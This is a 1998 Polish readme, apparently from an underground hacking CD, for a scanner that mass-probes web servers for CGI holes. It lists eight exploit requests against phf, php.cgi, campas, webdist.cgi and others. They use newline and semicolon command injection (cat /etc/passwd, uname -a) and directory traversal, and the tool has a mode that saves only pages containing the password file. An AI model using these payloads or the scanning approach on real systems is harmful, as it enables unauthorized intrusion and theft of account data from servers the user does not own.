home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / progsy / inne / skaner / CZYTAJ.txt next >
Encoding:
Text File  |  1998-06-08  |  2.5 KB  |  86 lines
  1. Czesc wszystkim...
  2.  
  3.  
  4. I. Program skanuje serwery pod wzgledem dziur php i phf:
  5.  
  6.     /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  7.     /cgi-bin/php.cgi?/etc/passwd
  8.     /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
  9.     /cgi-bin/phf?Qalias=hell%0auname%20-a%0a 
  10.     /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
  11.     /cgi-bin/campas?%0acat%0a/etc/passwd%0a
  12.     /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
  13.     /cgi-bin/view-source?../../../../../../../etc/passwd
  14.  
  15.    Ponadto istnieje mozliwosc wykorzystania innych,
  16.    nie wymienionych dziur.
  17.  
  18.  
  19. II. Adresy do sprawdzenia pobiera pliku, ktory musi miec
  20.     taka postac:
  21.  
  22.     [...]
  23.         www.www.www.www
  24.     aaa.aaa.aaa.aaa
  25.         123.123.123.123
  26.     [...]
  27.  
  28.  
  29. III. Prog moze pracowac w 3 trybach:
  30.  
  31.   1. Pobiera i zapisuje wszystkie sprawdzone
  32.      strony bez wzgledu na ich zawartosc lub
  33.      ewentualne bledy zwrocone przez serwer.
  34.   2. Pobiera i zapisuje tylko te strony, ktore
  35.      nie zwroca bledu (bez wzgledu na ich tresc).
  36.   3. Zapisuje strony zawierajce plik passwd.
  37.  
  38.  
  39. IV. Pobrane strony sa zapisywane w wybranym katalogu
  40.     w postaci:
  41.  
  42.     zzz.zzz.zzz.zzz_****.txt
  43.  
  44.     gdzie **** moze miec postac:
  45.  
  46.        phf1 dla /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  47.      php1 dla /cgi-bin/php.cgi?/etc/passwd 
  48.      phf2 dla /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
  49.      phf3 dla /cgi-bin/phf?Qalias=hell%0auname%20-a%0a
  50.      wha1 dla /cgi-bin/handler/whatever;cat  /etc/passwd| ?data=Download
  51.      cam1 dla /cgi-bin/campas?%0acat%0a/etc/passwd%0a
  52.      web1 dla /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
  53.      vie1 dla /cgi-bin/view-source?../../../../../../../etc/passwd
  54.      man1 dla tego co wpiszesz
  55.      man2 dla tego co wpiszesz
  56.      man3 dla tego co wpiszesz
  57.  
  58.  
  59. V. Wyniki sa zapisywane w trakcie pracy w pliku 
  60.    "log_aaa.txt", ktory znajduje sie w tym samym
  61.    katalogu co pobierane strony.
  62.  
  63.  
  64. To chyba wszystko...
  65. Nie bede opisywal co robi ten a co tamten
  66. przycisk bo to juz mozecie sami sprawdzic.
  67.  
  68. Jezeli prog bedzie chodzil zle lub wcale to sorry
  69. ale to moj pierwszy program dzialajacy online. 
  70. Mysle jednak ze wszystko przewidzialem i nie 
  71. powinno byc problemu.
  72. Jedyny blad jaki znalazlem ma miejsce przy
  73. przerywaniu skanowania.
  74. A to dlatego ze prog przerywa dopiero wtedy 
  75. gdy sprawdzi do konca dany host.
  76. Poprawie to w najblizszym czasie.
  77.  
  78. Jesli masz jakies propozycje czy uwagi 
  79. odnosnie skanera to daj znac.
  80.  
  81. Pozdrowienia.
  82.  
  83.  
  84.                -= natalis =-
  85.                       natalis@friko3.onet.pl
  86.                        Strange  Connection